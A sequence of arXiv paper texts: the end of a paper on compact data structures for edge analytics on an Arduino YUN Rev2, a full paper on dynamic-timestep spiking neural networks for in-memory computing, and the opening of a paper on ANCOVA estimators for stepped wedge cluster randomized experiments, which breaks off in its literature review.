Arduino YUN Rev2 can barely cope with data beyond 650 price records for one request. Therefore, we only conducted experiments with data amounts up to 650 records. The experimental results corresponding to different data sizes are exemplified in Table I. Footnote 2: [https://github.com/espressif/arduino-esp32/issues/1433](https://github.com/espressif/arduino-esp32/issues/1433) Note that in addition to the predesigned experiments (cf. Section III-C), we also measured baseline latencies, by treating Arduino YUN Rev2 as a relay. To avoid relaying data byte by byte, we let Arduino YUN Rev2 cache the incoming bytes and transmit individual records to the client. As such, we define the caching overhead as the non-CDS processing latency and distinguish it from the non-CDS wall-clock latency. From the numerical results in Table I, it is unsurprising to see that the CDS processing always takes more time than its corresponding baseline. According to the No-Free-Lunch theorem [16], the expected communicational benefit in the data analytics layer inevitably requires the computational cost in the CDS layer. However, when the data size is small (e.g., the record amount is 12 or 25), CDS seems to be able to bring extra benefits for the data communication, i.e. the reduced data size also lowers the wall-clock latency. To facilitate the observation, we further visualize the latency difference between the CDS and the non-CDS scenarios, as shown in Figure 5. Figure 4: Human-readable compact form of the sample data after the CDS conversion. (_In production, the bitwise machine-readable form can be more compact._) Figure 5: Latency difference between the CDS and the non-CDS scenarios. \[\frac{\text{Computation}}{\text{Communication}}=\frac{\text{Processing Latency}}{\text{ Wall-clock Latency }-\text{Processing Latency}} \tag{1}\] Benefiting from the visualization, it is not only clear that the latency difference keeps increasing along with the growth of data size, but that the processing latency difference increases significantly faster than the wall-clock latency difference. In other words, by referring to Eq. (1), the computation-to-communication ratio will become higher and higher when the CDS workload increases. Recall that distributed systems generally favor high computation-to-communication ratio for various purposes, ranging from efficient resource utilization to improved scalability [17]. From the perspective of a whole analytic task, we should reasonably maximize the transactional workloads on CDS processing units, while ignoring the aforementioned trivial extra benefits from small data sizes. ## IV Conclusions and Future Work By compacting data while still allowing the data to be queried, navigated, and manipulated without decompressing them, the CDS techniques are particularly promising for collaborative data analytics on the edge. However, applying CDS to edge computing may suffer from various challenges in different implementation scenarios. We argue that conjoint research efforts from relevant communities should be made to boost the emerging area of CDS-aided edge data analytics. After prototyping the static CDS implementation on an Arduino YUN Rev2, our future work will be unfolded along two directions. Firstly, we will extend this prototyping work to the data analytics layer and empirically study the impacts of the current CDS implementation. Secondly, we will start investigating dynamic CDS techniques in more complex use cases on the edge.
2305.17346
Input-Aware Dynamic Timestep Spiking Neural Networks for Efficient In-Memory Computing
Spiking Neural Networks (SNNs) have recently attracted widespread research interest as an efficient alternative to traditional Artificial Neural Networks (ANNs) because of their capability to process sparse and binary spike information and avoid expensive multiplication operations. Although the efficiency of SNNs can be realized on the In-Memory Computing (IMC) architecture, we show that the energy cost and latency of SNNs scale linearly with the number of timesteps used on IMC hardware. Therefore, in order to maximize the efficiency of SNNs, we propose input-aware Dynamic Timestep SNN (DT-SNN), a novel algorithmic solution to dynamically determine the number of timesteps during inference on an input-dependent basis. By calculating the entropy of the accumulated output after each timestep, we can compare it to a predefined threshold and decide if the information processed at the current timestep is sufficient for a confident prediction. We deploy DT-SNN on an IMC architecture and show that it incurs negligible computational overhead. We demonstrate that our method only uses 1.46 average timesteps to achieve the accuracy of a 4-timestep static SNN while reducing the energy-delay-product by 80%.
Yuhang Li, Abhishek Moitra, Tamar Geller, Priyadarshini Panda
2023-05-27T03:01:27Z
http://arxiv.org/abs/2305.17346v1
# Input-Aware Dynamic Timestep Spiking Neural Networks for Efficient In-Memory Computing ###### Abstract Spiking Neural Networks (SNNs) have recently attracted widespread research interest as an efficient alternative to traditional Artificial Neural Networks (ANNs) because of their capability to process sparse and binary spike information and avoid expensive multiplication operations. Although the efficiency of SNNs can be realized on the In-Memory Computing (IMC) architecture, we show that the energy cost and latency of SNNs scale linearly with the number of timesteps used on IMC hardware. Therefore, in order to maximize the efficiency of SNNs, we propose input-aware Dynamic Timestep SNN (DT-SNN), a novel algorithmic solution to dynamically determine the number of timesteps during inference on an input-dependent basis. By calculating the entropy of the accumulated output after each timestep, we can compare it to a predefined threshold and decide if the information processed at the current timestep is sufficient for a confident prediction. We deploy DT-SNN on an IMC architecture and show that it incurs negligible computational overhead. We demonstrate that our method only uses 1.46 average timesteps to achieve the accuracy of a 4-timestep static SNN while reducing the energy-delay-product by 80%. Spiking neural networks, in-memory computing, dynamic inference ## I Introduction Deep learning has revolutionized many challenging computational tasks such as computer vision and natural language processing [10] using Artificial Neural Networks (ANNs). These successes, however, have come at the cost of tremendous computing resources and high latency [6]. Over the past decade, Spiking Neural Networks (SNNs) have gained popularity as an energy-efficient alternative to ANNs [14, 17]. SNNs are different from ANNs in that they process inputs over a series of timesteps, whereas ANNs infer over what can be considered a single timestep. The biologically-plausible neurons in SNNs maintain a variable called membrane potential, which controls the behavior of the SNN over a series of timesteps. When the membrane potential exceeds a certain threshold, the neuron fires, creating a spike, and otherwise, the neuron remains inactive (neuron outputs a 0 or 1). Such spike-based computing creates sparsity in the computations and replaces multiplications with additions. Although the binary spike nature of SNNs eliminates the need for multiplications, compared to ANNs, SNNs require significantly more memory access due to multi-timestep computations on traditional von-Neumann architectures (called the "memory wall problem") [21]. To alleviate this problem, In-Memory Computing (IMC) hardware is used to perform analog dot-product operations to achieve high memory bandwidth and compute parallelism [15]. In this work, we mainly focus on achieving lower energy and latency in the case of IMC-implemented SNNs while maintaining iso-accuracy. Fig. 1(A) shows a component-wise energy distribution for the CIFAR10-trained VGG-16 network on 64\(\times\)64 4-bit RRAM IMC architecture. Among these, the digital peripherals (containing crossbar input switching circuits, buffers, and accumulators) entail the highest energy cost (45%). The IMC-crossbar and analog-to-digital converter (ADC) consumes the second highest energy (25%). Efforts to lower energy consumption have been made by previous works. As an example, prior IMC-aware algorithm-hardware co-design techniques [13, 22], have used pruning, quantization to reduce the ADC and crossbar energy, and area cost. However, in the case of SNNs, the improvement is rather limited because the crossbar and ADC only occupy 25% of the overall energy cost. Unlike ANNs, the number of timesteps in SNNs plays an important role in hardware performance, which is orthogonal to data precision or sparsity. In Fig. 1(B) we investigate how timesteps affect the energy consumption and latency of an SNN. Note that both metrics are normalized to the performance of a 1-timestep SNN. We find that both energy consumption and latency scale linearly with the number of timesteps, up to \(4.9\times\) more energy and \(8\times\) more latency when changing the number of timesteps from 1 to 8. More importantly, if one can reduce the number of timesteps in SNNs, then all parts in Fig. 1(A) can benefit from the energy and latency savings. These findings highlight the tremendous potential to optimize SNNs' performance on IMC hardware. In fact, [3, 8, 12] have explored ways to reduce the number of timesteps from an algorithmic perspective. They Fig. 1: Energy estimation on our IMC architecture using VGG-16 on CIFAR-10 dataset. (A) energy ratio of each unit, (B) energy/latency vs. timesteps. all train an SNN with a high number of timesteps first and then finetune the model with fewer timesteps later. However, their method decreases the number of timesteps for all input samples, thereby inevitably leading to an accuracy-timestep trade-off. In this paper, we tackle this problem with another solution. _We view the number of timesteps during inference as a variable conditional to each input sample._ We call our method Dynamic Timestep Spiking Neural Network (DT-SNN) as it varies the number of timesteps based on each input sample. In particular, we use entropy thresholding to determine the appropriate number of timesteps for each sample. To further optimize our algorithm in practice, we design a new training loss function and implement our algorithm on an IMC architecture. The main contributions of our work are summarized below: 1. Based on what we have seen thus far, this is the first work that changes the number of timesteps in SNNs based on the input, reducing computational overhead and increasing inference efficiency without compromising task performance. 2. To achieve that goal, we propose using entropy thresholding to distinguish the number of timesteps required. Meanwhile, we also provide a new training loss function and an IMC implementation of our method. 3. Extensive experiments are carried out to demonstrate the efficacy and efficiency of DT-SNN. For example, the DT-SNN ResNet-19 achieves the same accuracy as the 4-timestep SNN ResNet-19 with only an average of 1.27-timestep on the CIFAR-10 dataset, reducing 84% energy-delay-product. ## II Preliminaries We start by introducing the basic background of SNNs. We denote the overall spiking neural network as a function \(f_{T}(\mathbf{x})\) (\(\mathbf{x}\) is the input image), its forward propagation can be formulated as \[\mathbf{y}=f_{T}(\mathbf{x})=\frac{1}{T}\sum_{t=1}^{T}h\circ g^{L}\circ g^{L-1}\circ g ^{L-2}\circ\cdots g^{1}(\mathbf{x}), \tag{1}\] where \(g^{\ell}(\mathbf{x})=\mathrm{LIF}(\mathbf{W}^{\ell}\mathbf{x})\) denotes the \(\ell\)-th block. A block contains a convolutional layer, a leaky integrate-and-fire (LIF) layer, and an optional normalization layer placed in between the former two layers [23]. \(L\) represents the total number of blocks in the network and \(h(\cdot)\) denotes the final linear classifier. In this work, we use the direct encoding method, i.e., using \(g^{1}(\mathbf{x})\) to encode the input tensor into spike trains, as done in recent SNN works [20]. To get the final prediction, we repeat the inference process \(T\) times and average the output from the classifier. SNNs emulate the biological neurons using LIF layers. For each timestep, the input current charges the membrane potential \(\mathbf{u}\) in the LIF neurons. When the membrane potential exceeds a certain threshold, a spike \(\mathbf{s}\) will be fired to the next layer, given by \[\mathbf{u}^{\ell}[t+1]=\tau\mathbf{u}^{\ell}[t]+\mathbf{W}^{\ell}\mathbf{s}^{\ell}[t], \tag{2}\] \[\mathbf{s}^{\ell+1}[t+1]=\begin{cases}1&\text{if }\mathbf{u}^{\ell}[t+1]>V_{th}\\ 0&\text{otherwise}\end{cases}, \tag{3}\] where \(\tau\in(0,1]\) is the leaky factor, mimicking the potential decay. If a spike is fired, the membrane potential will be reset to 0, _i.e._\((\mathbf{u}[t+1]=\mathbf{u}[t+1]*(1-\mathbf{s}[t+1]))\). In the spiking neurons, all functions except the spike firing function (Eq. (3)) can be normally differentiated. The firing function generates a 0 gradient if \(\mathbf{u}^{\ell}[t+1]\neq V_{th}\), otherwise, it generates a gradient with infinity. This impedes the gradient-based optimization in SNNs. To overcome this problem, we leverage the surrogate gradient training method [19]. Specifically, in the forward propagation, we keep the original LIF neuron dynamics, while in the backward propagation, we use another function: \[\frac{\partial\mathbf{s}^{\ell}[t]}{\partial\mathbf{u}^{\ell}[t]}=\max(0,V_{th}-|\mathbf{u }^{\ell}[t]-V_{th}|) \tag{4}\] ## III Methodology In this section, we first introduce the algorithm for our work. Then we demonstrate the hardware implementation of DT-SNN. ### _Dynamic Timestep Spiking Neural Network_ Because spikes in an SNN are sparse and binary, the number of timesteps, therefore, controls the density of information inside the SNNs. Generally, more timesteps help SNNs explore more temporal information and thus achieve higher task performance. Fig. 2 demonstrates that when the number of timesteps of an SNN VGG-16 is increased from 1 to 4 during inference, the accuracy increases as well. Together with the hardware performance as shown in Fig. 1(B), the number of timesteps \(T\) controls a trade-off between hardware performance and task performance on an SNN model \(f_{T}(\cdot)\). Unlike the conventional approach where \(T\) is selected and fixed for all images, we propose a conditional probability of selecting \(T\) for different input \(\mathbf{x}\). We call our method the Dynamic Timestep Spiking Neural Network (DT-SNN). More concretely, denote \(\mathbb{P}(T|\mathbf{x})\) as the conditional probability of \(T\) with respect to \(\mathbf{x}\), DT-SNN is given by \[f_{\widehat{T}\sim\mathbb{P}(T|\mathbf{x})}=\frac{1}{\widehat{T}}\sum_{t=1}^{ \widehat{T}}h\circ g^{L}\circ g^{L-1}\circ g^{L-2}\circ\cdots g^{1}(\mathbf{x}). \tag{5}\] DT-SNN allows allocating a different number of timesteps for each input sample. As seen in Fig. 2, we find that the majority Fig. 2: The impact of the number of timesteps on the accuracy. We test the spiking VGG-16 on three datasets (CIFAR10, CIFAR100, TinyImageNet). of samples can be correctly classified with fewer timesteps. For example, on the CIFAR-100 dataset, 69.39% of overall test data can be correctly predicted using only 2 timesteps. Yet only 2.9% of test data needs full timesteps (\(T=4\)) to get the right prediction. If we compare the hardware performance, the 4-timestep model brings 86% more energy consumption and 100% more latency than the 2-timestep model. This observation is also applicable to other datasets like CIFAR10 and TinyImageNet. Choosing the Right \(T\)Our objective in DT-SNN is to reduce the unnecessary timesteps as much as possible while not compromising accuracy. However, finding the appropriate timestep for each input data is non-trivial. In this work, we use entropy to determine \(T\). Formally, given a dataset that has \(K\) classes, the prediction probability \(\pi(\mathbf{y}|\mathbf{x})\) is calculated by the Softmax function \((\sigma(\cdot))\), given by \[\pi(\mathbf{y}_{i}|\mathbf{x})=\sigma_{\mathrm{i}}(f(\mathbf{x}))=\frac{\exp(f(\mathbf{x})_{i} )}{\sum_{j=1}^{K}\exp(f(\mathbf{x})_{j})}, \tag{6}\] where \(\pi(\mathbf{y}_{i}|\mathbf{x})\) is the probability of predicting \(i\)-th class. The entropy can be further calculated by \[E_{f}(\mathbf{x})=-\frac{1}{\log K}\sum_{i=1}^{K}\pi(\mathbf{y}_{i}|\mathbf{x})\log\pi(\bm {y}_{i}|\mathbf{x}). \tag{7}\] Here, \(\log K\) ensures the final entropy is normalized to \((0,1]\). The entropy measures the state of uncertainty. For instance, if all classes have an equal probability of \(\frac{1}{K}\), the entropy will become 1, meaning the current state is completely random and uncertain. Instead, if one class's probability is approaching 1 while others are approaching 0, the entropy moves towards 0, indicating the state is becoming certain. Generally, the prediction accuracy is highly correlated with entropy. If the model is certain about some inputs (low entropy), the prediction would be highly probable to be correct, and vice versa [5]. Therefore, we select the \(T\) if the entropy is lower than some pre-defined threshold \(\theta\), given by \[\hat{T}(\mathbf{x})=\operatorname*{arg\,min}_{\hat{T}}\{E_{f_{T}}(\mathbf{x})<\theta| 1\leq\hat{T}<T\}\cup\{T\}. \tag{8}\] Here, the \(\hat{T}\) is selected based on the lowest timestep that can have lower-than-\(\theta\) entropy. If none of them can have confident output, the SNN will use maximum timesteps, _i.e._, \(T\). Training DT-SNNOriginally, the loss function for training an SNN is the cross-entropy function, given by: \[\mathcal{L}(\mathbf{x},\mathbf{z})=-\frac{1}{B}\sum_{i=1}^{K}\mathbf{z}_{i}\log\pi(f_{T}( \mathbf{x})_{i}|\mathbf{x}), \tag{9}\] where \(\mathbf{z}\) is the label vector and \(B\) is the batch size. Although the output from lower timesteps implicitly contributes to \(f_{T}(\mathbf{x})\), there lacks some explicit guidance to them. As shown in Fig. 2, the accuracy in the first timestep is always low. Here, we propose to explicitly add a loss function to each timestep output. The new loss function is defined as: \[\mathcal{L}(\mathbf{x},\mathbf{z})=-\frac{1}{TB}\sum_{t=1}^{T}\sum_{i=1}^{K}\mathbf{z}_{i }\log\pi(f_{t}(\mathbf{x})_{i}|\mathbf{x}), \tag{10}\] In practice, we find this loss function does not change much training time on GPUs. Also, we will demonstrate that adding this loss function can benefit the accuracy of the outputs from all timesteps, further improving our DT-SNN. Relation to Early Exit in ANNConceptually our DT-SNN is similar to the Early-Exit technique in ANN [18, 1] which adds multiple exits to different layers. Here, we want to clarify the relation between our DT-SNN and early exit: (1) DT-SNN is operated in the time dimension, it naturally fits SNNs and does not require any additional layers, while early exit has to add classifier layers in each branch; (2) DT-SNN has a higher potential than early exit: in experiments section, we will show that the majority of the examples can only use the first timestep, while the first exit in ANNs outputs marginal examples. Furthermore, DT-SNN is fully complementary to the early exit, that is, we can further add the early exit technique to SNN to fulfill even higher efficiency. ### _Hardware Implementation_ We implement DT-SNN on a tiled-monolithic chip architecture [2] as shown in Fig. 3a. First, the individual layers of an SNN are mapped onto tiles. The number of tiles occupied by an SNN layer depends on factors such as the crossbar size, the number of input and output channels in a layer, kernel size, and the number of crossbars per tile. To implement DT-SNN-specific functionality, we incorporate the following modifications in conventionally used architectures 1) A digital \(\sigma-E\) module to jointly compute the SoftMax (\(\sigma(\cdot)\)) and entropy (\(E\)) followed by threshold (\(\theta\)) comparison to detect whether to exit or not. 2) Timesteps are processed sequentially without pipelining. This eliminates the delay and hardware overhead (energy and area cost) required to empty the pipeline Fig. 3: Figure showing (a) monolithic-tiled IMC architecture implementation of an SNN (b) architecture of the \(\sigma-E\) module for softmax and entropy value computation. in case of dynamic timestep inference. The tiles additionally contain global accumulators (GA) and global buffers (GB) for accumulating partial sums and storing the intermediate outputs, respectively from different processing elements (PE). At the tile level, all modules are connected via a Network-on-Chip (NoC) interconnect. Each tile consists of several PEs, accumulators, and buffers. Each PE contains several crossbars, accumulators and buffers. The PEs and crossbars are connected by an H-Tree interconnect. We use a standard 2D-IMC crossbar connected to peripherals such as switch matrix, multiplexers, analog-to-digital converters (ADCs), and Shift-\(\&\)-Add circuits. The switch matrix provides input voltages at the source lines (SL) while simultaneously activating the word lines (WL). The voltages accumulate over the bit lines (BL). The analog MAC value (partial sum output) is converted to a digital value using the ADC. Multiplexers enable resource sharing of ADCs and Shift-\(\&\)-Add circuits among multiple crossbar columns to reduce the area overheads. The digital partial sum outputs from different crossbars, PEs and tiles are accumulated using the PE, tile, and global accumulators, respectively. For all layers except the last, the final MAC outputs from the GA are transferred to the LIF module for the non-linear activation functionality. The spike outputs are relayed to the tiles mapping the subsequent layers. For the last layer (a fully connected layer) the GA accumulated MAC output is directed to the \(\sigma-E\) module as shown in Fig. 3a (using red arrows). Inside the \(\sigma-E\) module MAC outputs are stored in the \(y\)-FIFO buffer. The depth of \(y\)-FIFO depends on the dataset. For example, in CIFAR10, the FIFO depth is 10. Data from the \(y\)-FIFO is passed to the address lines of the \(\sigma\)-LUT to compute \(\sigma\) which are pushed into the \(\sigma\)-FIFO. The \(\sigma\)-FIFO outputs are sent as inputs to the Entropy Module that contains LUT for \(\log(\sigma)\) computation. The Entropy Module additionally contains a multiplier and accumulator circuit (comprised of an adder and register) to implement the entropy computation using Eq. (7). If the computed entropy is less than the threshold \(\theta\), the inference is terminated and new input data is loaded into the GB. DT-SNN is implemented on the IMC architecture using parameters shown in Table I. **Energy Consumption of the \(\sigma-E\) module:** Based on 32nm CMOS implementations, we find that the energy consumed by the \(\sigma-E\) module for one timestep is merely \(2e^{-5}\times\) of the 1 timestep inference energy consumed by the IMC architecture, which is negligible. ## IV Experimental Results In this section, we present the evaluation of both the task performance and the hardware performance of DT-SNN, highlighting its extreme efficacy and efficiency. ### _Comparison with Static SNN_ We select 4 popular visual benchmarks for evaluation, CIFAR-10 [9], CIFAR-100 [9], TinyImageNet [4], and CIFAR10-DVS [11] dataset. For the architecture, we choose to use VGG-16 [16] and ResNet-19 [7]. We compare our DT-SNN with the static SNN, _i.e.,_ an SNN that uses a fixed number of timesteps for all inputs. The training method for the static SNN and the DT-SNN are kept the same, except that the static SNN uses Eq. (9) as training loss while DT-SNN uses Eq. (10). We train them with a batch size of 256, a learning rate of 0.1 followed by a cosine decay. The L2 regularization is set to 0.0005. The number of timesteps is set to 4 as done in existing work [23]. For task metrics, we report the top-1 accuracy on the visual benchmarks. As for hardware metrics, we measure them based on the parameters shown in Table I and further normalize them w.r.t. static SNNs. We report the number of timesteps (\(T\)), energy, and energy-delay-product (EDP). Note that the cost of DT-SNN is varied across input data, thus we average the hardware metrics in the test dataset. #### Iv-A1 Comparison of Accuracy, Energy Cost, and \(T\) We summarize the results of 4 datasets in Table II. Here, we test static SNN with the full number of timesteps, _i.e.,_\(T=4\), and compare the hardware performances with DT-SNN under a similar accuracy level. We find that DT-SNN only needs 1.46 average timesteps on the CIFAR-10 dataset, bringing more than 50% energy saving. For the other three datasets, DT-SNN requires roughly half the number of timesteps used in a static SNN model. Nevertheless, DT-SNN reduces at least 40% of energy cost when compared to static SNN. Fig. 4: Comparison between static SNN and DT-SNN in terms of Energy-Delay-Product (EDP) (normalized to the static SNN). #### Vi-A2 Comparison of EDP We next compare the EDP between static SNNs and DT-SNNs. EDP is more suitable for measuring a holistic performance in hardware because it considers both time and energy efficiency. Fig. 4 shows the EDP comparison normalized by the EDP of the static SNN. We can find that DT-SNN is extremely efficient as it reduces 61.2%\(\sim\)80.9% EDP of static SNNs. These results highlight the efficiency brought by our method, leading to both energy cost and latency reduction. #### Vi-A3 Accuracy vs. EDP curve The static SNN can adjust the number of timesteps for all inputs to balance its accuracy and efficiency. Our DT-SNN can also adjust threshold \(\theta\) to balance such a trade-off. Here, we draw an accuracy-EDP curve in Fig. 5. _Note that here the EDP is normalized to the EDP of the 1-timestep static SNN._ We evaluate static SNN at 1,2,3, and 4 timesteps, and evaluate DT-SNN using three different thresholds. It can be seen that our DT-SNN is placed in the top-left corner, indicating a better accuracy-EDP trade-off than the static SNN. Remarkably, DT-SNN can bring significant improvement in low-timestep scenarios. For instance, DT-SNN VGG-16 increases the accuracy by 17% when compared to the 1-timestep static counterpart on the CIFAR-10 dataset, while it only has \(\sim\)10% higher EDP. In order to further visualize the dynamic timesteps in our method, Fig. 5 provides three pie charts in each case, which show the percentage of input examples that are inferred with 1, 2, 3, or 4 timesteps. Notably, \(T=1\) is usually the most selected case for the input due to the fact that most input examples can be correctly predicted using only 1 timestep. As the threshold decreases, more images start to use higher timesteps. Overall, we find \(T=3\) and \(T=4\) are rarely used in DT-SNN, demonstrating the effectiveness of our method to reduce redundant timesteps. #### Vi-A4 Comparison with Prior Work : Here, we also compare our method with prior work on SNNs. We compare tdBN [23] and Dspike [12] with our static-SNN and DT-SNN trained with Eq. (10). Fig. 6(A) shows the accuracy under different \(T\). Our DT-SNN reaches a new state of the art. #### Vi-A5 Non-Ideal Accuracy with Device Variations So far, all the experiments are performed without considering device conductance variation. In Fig. 6(B), we compare DT-SNN and static SNN under 20% device conductance variation. We simulate this by adding noise to the weights post-training. We see that DT-SNN still maintains higher accuracy while eliminating the redundant timesteps compared to static-SNN. ### _Acceleration in General Processors_ In the previous section, we demonstrated that our DT-SNN can accelerate the inference on an IMC architecture. Here, we show that apart from the IMC architecture we simulated, our method can also be applicable to other types of hardware like digital processors. To this end, we measure the inference throughput (_i.e.,_ the number of images inferred per second) on an RTX 2080Ti GPU simulated by PyTorch using batch size 1. Table III lists the accuracy, (averaged) timesteps, and throughput. As can be seen from the table, the throughput on GPU significantly reduces as the timesteps are increased. Fig. 5: Accuracy vs. EDP curve for both static SNN (drawn by pink line) and DT-SNN (drawn by blue line). For the static SNN, we report the accuracy and EDP when \(T=\{1,2,3,4\}\). For the DT-SNN, we draw the pie charts illustrating the distribution of \(\hat{T}(\mathbf{x})\). Fig. 6: Accuracy vs. the number of timesteps. (A) Comparison with prior works, (B) Comparison under non-ideal (NI) device variation in the IMC. Compared to static SNNs, our DT-SNN substantially improves the throughput while not sacrificing accuracy. For example, DT-SNN ResNet-19 with 1.07 averaged timesteps can infer 169.3 images per second, quite close to the 1-timestep static SNN (185.3 images per second), yet still bringing 3.4% accuracy improvement. ### _Ablation Study_ In this section, we ablate the training loss function choice. To verify this, we train static an SNN VGG-16 on CIFAR-10 either with Eq. (9) or Eq. (10) and test the corresponding accuracies of both static SNN and DT-SNN. Fig. 7 demonstrates the comparison between these two loss functions. We find that our training loss boosts the accuracy of all timesteps in the static SNN. In particular, the first timestep of VGG-16 changes from 76.3% to 91.5%. This result proves that explicit guidance from label annotations should be added to the lower timesteps. Meanwhile, it also increases the full timestep performance, resulting in a 0.6% accuracy increase on VGG-16. This improvement is extremely beneficial to DT-SNN. According to the pie charts describing the distribution of \(\hat{T}\), we find our training loss function enables a smaller number of timesteps to be required to classify the test data, thus reducing the EDP significantly. ### _Visualization_ In this section, we visualize the input images that are differentiated by our DT-SNN. Ideally, we anticipate DT-SNN can identify whether an image is easy or hard to infer (corresponding to 4 or 1 timestep). To maximize the differentiation, we use a low threshold to filter out the high timesteps, so that only the easiest images can be classified in the first timestep and vice versa. Fig. 8 presents the results on the TinyImageNet dataset. Generally, we find the images inferred with 1 timestep exhibit a simple structure: a clear object placed in the center of a clean background. In contrast, hard images require 4 timesteps and usually mix the background and the object together, making the object imperceptible. ## V Conclusion In this work, we introduce the Dynamic Timestep Spiking Neural Network, a simple yet significantly effective method that selects different timesteps for different input samples. DT-SNN determines the suitable timestep based on the confidence of the model output, seamlessly fitting the nature of sequential processing over time in SNNs. Moreover, DT-SNN is practical. It can be deployed to IMC architecture and even general digital processors. Extensive experiments prove that DT-SNN establishes a new state-of-the-art trade-off between hardware efficiency and task performance.
2306.11267
Model-assisted analysis of covariance estimators for stepped wedge cluster randomized experiments
Stepped wedge cluster randomized experiments (SW-CREs) represent a class of unidirectional crossover designs. Although SW-CREs have become popular, definitions of estimands and robust methods to target estimands under the potential outcomes framework remain insufficient. To address this gap, we describe a class of estimands that explicitly acknowledge the multilevel data structure in SW-CREs and highlight three typical members of the estimand class that are interpretable. We then introduce four analysis of covariance (ANCOVA) working models to achieve estimand-aligned analyses with covariate adjustment. Each ANCOVA estimator is model-assisted, as its point estimator is consistent even when the working model is misspecified. Under the stepped wedge randomization scheme, we establish the finite population Central Limit Theorem for each estimator. We study the finite-sample operating characteristics of the ANCOVA estimators in simulations and illustrate their application by analyzing the Washington State Expedited Partner Therapy study.
Xinyuan Chen, Fan Li
2023-06-20T03:45:21Z
http://arxiv.org/abs/2306.11267v4
# Model-assisted analysis of covariance estimators for stepped wedge cluster randomized experiments ###### Abstract Stepped wedge cluster randomized experiments represent a class of unidirectional crossover designs that are increasingly adopted for comparative effectiveness and implementation science research. Although stepped wedge cluster randomized experiments have become popular, definitions of estimands and robust methods to target clearly-defined estimands remain insufficient. To address this gap, we describe a class of estimands that explicitly acknowledge the multilevel data structure in stepped wedge cluster randomized experiments, and highlight three typical members of the estimand class that are interpretable and are of practical interest. We then discuss four formulations of analysis of covariance (ANCOVA) working models to achieve estimand-aligned analyses. By exploiting baseline covariates, each ANCOVA model can potentially improve the estimation efficiency over the unadjusted estimators. In addition, each ANCOVA estimator is model-assisted in a sense that its point estimator is consistent to the target estimand even when the working model is misspecified. Under the stepped wedge randomization scheme, we establish the finite population Central Limit Theorem for each estimator, which motivates design-based variance estimators. Through simulations, we study the finite-sample operating characteristics of the ANCOVA estimators under different data generating processes. We illustrate their applications via the analysis of the Washington State Expedited Partner Therapy study. **Keywords:** causal inference, covariate adjustment, Central Limit Theorem, cluster randomized trials, design-based inference, estimands. ## 1 Introduction Stepped wedge cluster randomized experiments, or alternatively referred to as stepped wedge designs, are frequently used in assessing the causal effect of candidate treatments in public health, medicine and implementation science research, and are increasingly popular in pragmatic clinical trials. Under a stepped wedge design, all clusters are recruited at baseline and are placed under the usual care condition; the intervention will then be rolled out in a staggered fashion across the follow-up periods until all clusters are exposed under the intervention (Hussey and Hughes, 2007; Turner et al., 2017). In other words, each cluster will be randomized to a specific time point when the intervention starts to roll out, and can be mapped to a monotonic _treatment sequence_ over multiple periods. Compared to the conventional parallel-arm cluster randomized designs, stepped wedge designs are particularly attractive when concurrent implementation of the candidate treatment may incur substantial stress on administrative planning and logistical infrastructure, or when there is a desire to ensure complete rollout of the intervention in all clusters during the course of the study. Hemming and Taljaard (2020) provided four broad justifications on when stepped wedge designs are an appropriate design choice. Over the past decade, research on stepped wedge designs has placed much emphasis on trial planning to achieve sufficient statistical power with different intracluster correlation structures; a review of software for planning stepped wedge cluster randomized experiments can be found in Ouyang et al. (2022). Despite the efforts devoted to study planning, robust methods for analyzing stepped wedge cluster randomized experiments have received relatively less attention, with a few exceptions such as Thompson et al. (2018); Hughes et al. (2020); Kenny et al. (2022). There are two main challenges that remain not fully addressed from these previous studies. First, the typical analysis strategies include mixed-effects regression and generalized estimating equations with multilevel working correlation structures, but do not explicitly address whether the treatment effect estimates were intended to generalize to the expected value of outcomes when applied to new clusters or new patient populations. In parallel-arm cluster randomized experiments, the use of model-based methods have been shown to produce treatment effect estimates that are not always straightforward to interpret (Wang et al., 2022), when there is treatment effect heterogeneity according to cluster size. As the targets of inference, causal estimands are ideally defined at the outset to facilitate decision-making, and a clear description of estimands is vitally important for cluster randomized experiments (Kahan et al., 2022). Second, with clearly-defined target estimands, analytical methods should ideally be _model-assisted_ rather than model-based in that the estimated treatment effects are unbiased for the specified estimands even if certain model assumptions fail to hold, and _efficient_ so that the uncertainty around the effect estimates is minimal to ensure a greater chance of identifying the treatment effect when it exists. As the number of available clusters is typically limited, methods with higher efficiency are critical for improving evidence generation through stepped wedge designs, and leveraging baseline covariates is a promising technique. However, recent methodological reviews (Li et al., 2021; Li and Wang, 2022) devoted to stepped wedge cluster randomized experiments showed that (1) model-based methods with parametric assumptions are prevalent, (2) estimands are not defined at the outset but rather considered as the regression coefficients of the treatment variable in mixed-effects models or generalized estimating equations framework, and (3) few development considered incorporating baseline covariates. Therefore, the extent to which covariate adjustment can improve efficiency but without compromising clearly-defined estimands in analyzing stepped wedge designs requires important clarification. In this article, we adopt a finite population perspective to define relevant causal estimands that acknowledge the multilevel data structure of a stepped wedge design, and to study robust regression-adjusted estimators for identifying these estimands. Our estimands generalize the counterparts in parallel-arm designs considered in Su and Ding (2021) and Kahan et al. (2022) to longitudinal cluster randomized designs. Apart from defining different versions of causal estimands, we also provide different formulations of analysis of covariance (ANCOVA) models that can enable model-assisted estimation. The ANCOVA working models differ with respect to considerations on period-specific covariate main effects and treatment-by-covariate interactions. We establish, for each ANCOVA estimator, the finite population Central Limit Theorem (Li and Ding, 2017), and motivate a design-based standard error estimator (Scott and Wu, 1981; Schochet et al., 2021) under the staggered rollout randomization scheme. We conduct simulation studies to evaluate the finite-sample properties of the proposed estimators and compare their performances in terms of estimation efficiency. Our simulation results substantiate the large-sample consistency and asymptotic normality of proposed estimators, and confirm that estimators adjusting for covariates lead to improved efficiency over the unadjusted estimators; however, the optimal estimator can depend on the data generating process. In addition, we also compare the performance of design-based standard error estimator with the conventional cluster-robust standard error (Liang and Zeger, 1986) through simulations to generate practical recommendations. Our work contributes to the burgeoning literature on design-based analysis of cluster randomized experiments. For parallel-arm cluster randomized designs, Imai et al. (2009) and Middleton and Aronow (2015) discussed nonparametric difference-in-means estimators for the average treatment effect, in the absence of covariates. Schochet et al. (2021) established the finite population Central Limit Theorem of an ANCOVA estimator applied to blocked cluster randomization, and compared the operating characteristics of the design-based standard error estimator and the cluster robust sandwich standard error estimator analytically and via simulations. Su and Ding (2021) extended their results to cluster randomized experiments and elucidated the efficiency implications due to covariate adjustment from ANCOVA estimators under parallel-arm randomization. Our work differs from these existing works due to the focus on stepped wedge cluster randomized experiments with staggered treatment rollout. Our work is also connected to the literature of design-based difference-in-difference estimators; see, for example Athey and Imbens (2022); Callaway and Sant'Anna (2021); de Chaisemartin and D'Haultfoeuille (2020); Roth and Sant'Anna (2021); Schochet (2022); 